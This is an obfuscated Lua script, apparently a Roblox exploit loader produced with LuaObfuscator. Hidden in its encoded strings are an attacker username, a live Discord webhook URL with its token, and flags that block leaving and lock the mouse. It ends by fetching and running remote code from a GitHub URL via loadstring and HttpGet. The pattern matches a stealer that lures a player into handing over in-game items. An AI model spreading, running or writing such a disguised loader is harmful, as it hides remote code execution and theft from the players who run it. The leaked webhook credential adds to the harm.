--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.12) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v67=0;while true do if (v67==0) then v19=v0(v3(v30,1,1));return "";end end else local v68=v2(v0(v30,16));if v19 then local v74=v5(v68,v19);v19=nil;return v74;else return v68;end end end);local function v20(v31,v32,v33)if v33 then local v69=(v31/(((882 -(282 + 595)) -3)^(v32-(2 -(1638 -(1523 + 114))))))%((3 -(1 + 0))^(((v33-((2 -0) -1)) -(v32-(620 -(555 + 64)))) + (932 -(857 + 74)))) ;return v69-(v69%(569 -(367 + 201))) ;else local v70=(929 -(214 + 713))^(v32-((1066 -(68 + 997)) + 0)) ;return (((v31%(v70 + v70))>=v70) and 1) or (0 + 0) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + (1272 -(226 + 1044)) );v18=v18 + 2 ;return (v36 * (1114 -858)) + v35 ;end local function v23()local v37=117 -(32 + 85) ;local v38;local v39;local v40;local v41;while true do if (v37==(1 + 0)) then return (v41 * 16777216) + (v40 * (14533 + 51003)) + (v39 * (1213 -(892 + 65))) + v38 ;end if (v37==(0 -0)) then v38,v39,v40,v41=v1(v16,v18,v18 + 3 );v18=v18 + 4 ;v37=1 -(0 -0) ;end end end local function v24()local v42=v23();local v43=v23();local v44=351 -(87 + 263) ;local v45=(v20(v43,181 -(67 + 113) ,15 + 5 ) * ((4 -2)^(24 + 8))) + v42 ;local v46=v20(v43,4 + 17 ,123 -92 );local v47=((v20(v43,32)==(953 -(802 + 150))) and  -(2 -(1 -0))) or 1 ;if (v46==0) then if (v45==0) then return v47 * ((0 + 0) -0) ;else v46=1 + 0 ;v44=997 -(915 + 82) ;end elseif (v46==2047) then return ((v45==(0 -0)) and (v47 * ((1 + 0)/(0 -(791 -(368 + 423)))))) or (v47 * NaN) ;end return v8(v47,v46-(2210 -(1069 + 118)) ) * (v44 + (v45/((4 -2)^(113 -61)))) ;end local function v25(v48)local v49=438 -(145 + 293) ;local v50;local v51;while true do if (v49==(9 -6)) then return v6(v51);end if (v49==0) then v50=nil;if  not v48 then local v93=(65 -47) -(10 + 8) ;while true do if (v93==(0 + (0 -0))) then v48=v23();if (v48==0) then return "";end break;end end end v49=3 -(861 -(814 + 45)) ;end if (v49==((1093 -649) -(416 + 26))) then v51={};for v75=3 -(1 + 1) , #v50 do v51[v75]=v2(v1(v3(v50,v75,v75)));end v49=1141 -(116 + 1022) ;end if (v49==(1 + 0)) then v50=v3(v16,v18,(v18 + v48) -(1 + 0) );v18=v18 + v48 ;v49=3 -1 ;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=0 -0 ;local v53;local v54;local v55;local v56;local v57;local v58;local v59;while true do if (v52==(1637 -(1373 + 263))) then v55=nil;v56=nil;v52=1002 -(451 + 549) ;end if (v52==(0 + 0)) then v53=0 + 0 ;v54=nil;v52=1 -0 ;end if ((2 -0)==v52) then v57=nil;v58=nil;v52=1387 -(746 + 638) ;end if (v52~=(2 + 1)) then else v59=nil;while true do local v77=0 + 0 ;local v78;while true do if (v77~=(0 -0)) then else v78=0 -0 ;while true do if (v78==0) then local v101=731 -(476 + 255) ;while true do if (0~=v101) then else if ((1131 -(369 + 761))==v53) then local v149=0 + 0 ;local v150;while true do if (v149==(341 -(218 + 123))) then v150=1581 -(1535 + 46) ;while true do if (v150==0) then local v160=0;while true do if (v160==(1 + 0)) then v150=239 -(64 + 174) ;break;end if (v160==0) then v58=v23();v59={};v160=1 + 0 ;end end end if (v150==(1 -0)) then local v161=336 -(144 + 192) ;while true do if (v161==1) then v150=218 -(42 + 174) ;break;end if (v161==(560 -(306 + 254))) then for v164=1 + 0 ,v58 do local v165=0 + 0 ;local v166;local v167;local v168;local v169;while true do if ((0 + 0)==v165) then v166=0 -0 ;v167=nil;v165=1581 -(1183 + 397) ;end if (v165==(1468 -(899 + 568))) then v168=nil;v169=nil;v165=2 + 0 ;end if (v165==2) then while true do if (v166==(0 -0)) then local v177=0;while true do if (v177==(0 + 0)) then v167=1975 -(1913 + 62) ;v168=nil;v177=1 + 0 ;end if (v177==1) then v166=2 -1 ;break;end end end if (v166~=(604 -(268 + 335))) then else v169=nil;while true do if (v167==(3 -2)) then if (v168==1) then v169=v21()~=(1661 -(1477 + 184)) ;elseif (v168==(2 -0)) then v169=v24();elseif (v168~=(3 + 0)) then else v169=v25();end v59[v164]=v169;break;end if (v167~=(856 -(564 + 292))) then else local v185=290 -(60 + 230) ;local v186;while true do if ((0 -0)==v185) then v186=572 -(426 + 146) ;while true do if (v186==(0 + 0)) then local v188=1456 -(282 + 1174) ;while true do if (1~=v188) then else v186=812 -(569 + 242) ;break;end if (0==v188) then v168=v21();v169=nil;v188=2 -1 ;end end end if (v186~=(2 -1)) then else v167=305 -(244 + 60) ;break;end end break;end end end end break;end end break;end end end v57[1 + 2 ]=v21();v161=1;end end end if (v150==(1026 -(706 + 318))) then v53=478 -(41 + 435) ;break;end end break;end end end if (v53==2) then local v151=1251 -(721 + 530) ;local v152;while true do if (v151~=(1271 -(945 + 326))) then else v152=0 + 0 ;while true do if (v152==0) then local v162=0 -0 ;while true do if (v162==(1125 -(936 + 189))) then for v170=1 + 0 ,v23() do local v171=700 -(271 + 429) ;local v172;local v173;while true do if (v171==(1 + 0)) then while true do if ((0 + 0)==v172) then v173=v21();if (v20(v173,1139 -(782 + 356) ,1501 -(1408 + 92) )==(1086 -(461 + 625))) then local v178=0;local v179;local v180;local v181;local v182;local v183;while true do if (v178==(1290 -(993 + 295))) then v183=nil;while true do if (v179==(1092 -(975 + 117))) then local v187=0 + 0 ;while true do if ((1171 -(418 + 753))==v187) then v180=0;v181=nil;v187=1 + 0 ;end if (v187==1) then v179=1;break;end end end if (v179==(1 + 1)) then while true do if (v180~=(1 + 1)) then else local v189=0 -0 ;local v190;local v191;while true do if (v189~=(0 + 0)) then else v190=0;v191=nil;v189=530 -(406 + 123) ;end if (v189==(1770 -(1749 + 20))) then while true do if ((0 + 0)~=v190) then else v191=0;while true do if (v191~=(1322 -(1249 + 73))) then else if (v20(v182,1 + 0 ,1)==(1146 -(466 + 679))) then v183[2]=v59[v183[4 -2 ]];end if (v20(v182,5 -3 ,1902 -(106 + 1794) )==(1228 -(322 + 905))) then v183[614 -(602 + 9) ]=v59[v183[1 + 2 ]];end v191=873 -(826 + 46) ;end if ((1 + 0)==v191) then v180=9 -6 ;break;end end break;end end break;end end end if ((1 + 2)==v180) then if (v20(v182,8 -5 ,7 -4 )==(115 -(4 + 110))) then v183[588 -(57 + 527) ]=v59[v183[1431 -(41 + 1386) ]];end v54[v170]=v183;break;end if (v180==(104 -(17 + 86))) then local v193=0 + 0 ;while true do if (v193==(0 + 0)) then local v199=0 -0 ;while true do if (v199~=(2 -1)) then else v193=1 -0 ;break;end if (0~=v199) then else v183={v22(),v22(),nil,nil};if (v181==(1205 -(902 + 303))) then local v200=0 -0 ;local v201;while true do if (v200==(0 + 0)) then v201=0;while true do if (v201==0) then v183[1 + 2 ]=v22();v183[7 -3 ]=v22();break;end end break;end end elseif (v181==(66 -(30 + 35))) then v183[3]=v23();elseif (v181==(216 -(22 + 192))) then v183[3 + 0 ]=v23() -((1259 -(1043 + 214))^(60 -44)) ;elseif (v181==(686 -(483 + 200))) then local v212=1212 -(323 + 889) ;local v213;local v214;while true do if (1~=v212) then else while true do if (v213==(0 -0)) then v214=1463 -(1404 + 59) ;while true do if (v214==(0 -0)) then v183[3 -0 ]=v23() -(2^(596 -(361 + 219))) ;v183[324 -(53 + 267) ]=v22();break;end end break;end end break;end if (v212~=(0 + 0)) then else v213=0 -0 ;v214=nil;v212=2 -1 ;end end end v199=1 -0 ;end end end if ((414 -(15 + 398))~=v193) then else v180=984 -(18 + 964) ;break;end end end if (v180==0) then local v194=236 -(141 + 95) ;local v195;local v196;while true do if (v194~=(0 -0)) then else v195=0 + 0 ;v196=nil;v194=1;end if (v194==(2 -1)) then while true do if ((0 + 0)==v195) then v196=0;while true do if (v196~=(0 + 0)) then else local v202=850 -(20 + 830) ;while true do if (v202~=1) then else v196=1 + 0 ;break;end if (v202==0) then local v209=126 -(116 + 10) ;while true do if ((0 + 0)==v209) then v181=v20(v173,2,741 -(542 + 196) );v182=v20(v173,4,4 + 2 );v209=1 -0 ;end if (1~=v209) then else v202=1 + 0 ;break;end end end end end if (v196==1) then v180=1;break;end end break;end end break;end end end end break;end if (v179==(1 + 0)) then v182=nil;v183=nil;v179=2 + 0 ;end end break;end if (v178==0) then v179=0 + 0 ;v180=nil;v178=1 -0 ;end if (v178~=1) then else v181=nil;v182=nil;v178=4 -2 ;end end end break;end end break;end if (v171==(765 -(574 + 191))) then local v176=0 -0 ;while true do if ((1551 -(1126 + 425))~=v176) then else v172=0 + 0 ;v173=nil;v176=406 -(118 + 287) ;end if (v176~=(3 -2)) then else v171=1;break;end end end end end for v174=1,v23() do v55[v174-(1122 -(118 + 1003)) ]=v28();end v162=1;end if (v162~=(2 -1)) then else v152=378 -(142 + 235) ;break;end end end if (v152==(127 -(55 + 71))) then return v57;end end break;end end end v101=1 -0 ;end if (v101~=(1791 -(573 + 1217))) then else v78=4 -3 ;break;end end end if (v78~=1) then else if (v53==0) then local v120=0 + 0 ;while true do if (1==v120) then local v153=0;while true do if (v153~=(978 -(553 + 424))) then else v120=3 -1 ;break;end if (v153~=(0 + 0)) then else v56={};v57={v54,v55,nil,v56};v153=1 + 0 ;end end end if (v120~=2) then else v53=2 -1 ;break;end if (v120==(0 + 0)) then local v154=0 -0 ;while true do if (v154==(0 -0)) then v54={};v55={};v154=2 -1 ;end if (v154==(2 -1)) then v120=1;break;end end end end end break;end end break;end end end break;end end end local function v29(v60,v61,v62)local v63=0;local v64;local v65;local v66;while true do if (v63==1) then v66=v60[3];return function(...)local v79=v64;local v80=v65;local v81=v66;local v82=v27;local v83=1;local v84= -1;local v85={};local v86={...};local v87=v12("#",...) -1 ;local v88={};local v89={};for v94=0,v87 do if (v94>=v81) then v85[v94-v81 ]=v86[v94 + 1 ];else v89[v94]=v86[v94 + 1 ];end end local v90=(v87-v81) + 1 ;local v91;local v92;while true do v91=v79[v83];v92=v91[1];if (v92<=5) then if (v92<=2) then if (v92<=0) then local v102;local v103,v104;local v105;local v106;v89[v91[2]][v91[3]]=v91[4];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v62[v91[3]];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v62[v91[3]];v83=v83 + 1 ;v91=v79[v83];v106=v91[2];v105=v89[v91[3]];v89[v106 + 1 ]=v105;v89[v106]=v105[v91[4]];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v91[3];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v91[3]~=0 ;v83=v83 + 1 ;v91=v79[v83];v106=v91[2];v103,v104=v82(v89[v106](v13(v89,v106 + 1 ,v91[3])));v84=(v104 + v106) -1 ;v102=0;for v121=v106,v84 do v102=v102 + 1 ;v89[v121]=v103[v102];end v83=v83 + 1 ;v91=v79[v83];v106=v91[2];v89[v106]=v89[v106](v13(v89,v106 + 1 ,v84));v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]();v83=v83 + 1 ;v91=v79[v83];do return;end elseif (v92==1) then local v124=0;local v125;local v126;local v127;local v128;while true do if (v124==1) then v84=(v127 + v125) -1 ;v128=0;v124=2;end if (v124==0) then v125=v91[2];v126,v127=v82(v89[v125](v13(v89,v125 + 1 ,v91[3])));v124=1;end if (v124==2) then for v156=v125,v84 do local v157=0;while true do if (v157==0) then v128=v128 + 1 ;v89[v156]=v126[v128];break;end end end break;end end else local v129=v91[2];v89[v129]=v89[v129](v13(v89,v129 + 1 ,v84));end elseif (v92<=3) then v89[v91[2]][v91[3]]=v91[4];elseif (v92>4) then v89[v91[2]]=v62[v91[3]];else local v133=v91[2];local v134=v89[v91[3]];v89[v133 + 1 ]=v134;v89[v133]=v134[v91[4]];end elseif (v92<=8) then if (v92<=6) then v89[v91[2]]();elseif (v92==7) then v89[v91[2]]=v91[3]~=0 ;else v62[v91[3]]=v89[v91[2]];end elseif (v92<=9) then do return;end elseif (v92>10) then v89[v91[2]]=v91[3];else v89[v91[2]]=v91[3];v83=v83 + 1 ;v91=v79[v83];v62[v91[3]]=v89[v91[2]];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v91[3];v83=v83 + 1 ;v91=v79[v83];v62[v91[3]]=v89[v91[2]];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v91[3];v83=v83 + 1 ;v91=v79[v83];v62[v91[3]]=v89[v91[2]];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v62[v91[3]];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]][v91[3]]=v91[4];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v62[v91[3]];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]][v91[3]]=v91[4];end v83=v83 + 1 ;end end;end if (0==v63) then v64=v60[1];v65=v60[2];v63=1;end end end return v29(v28(),{},v17)(...);end v15("LOL!0F3O0003083O00557365724E616D65030E3O0067722O656E6265616E352O30313403073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O312O3332343533312O352O302O3234362O342F6E336E4A5841464535415F714E5049566D45427245485567526B492D6C654E3933616D542O505678706A3357666B676444342O494D6B374B656279565A315A396943745503093O00557365724E616D653203093O00647572652O74656D7003023O005F47030D3O004C6F6164696E675363722O656E2O0103093O00416E74694C6561766503093O004D6F7573654C6F636B030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970745A00153O00120A3O00023O00124O00013O00124O00043O00124O00033O00124O00063O00124O00053O00124O00073O00304O0008000900124O00073O00304O000A00090012053O00073O00304O000B000900124O000C3O00122O0001000D3O00202O00010001000E00122O0003000F6O000400016O000100049O0000026O000100016O00017O00",v9(),...);
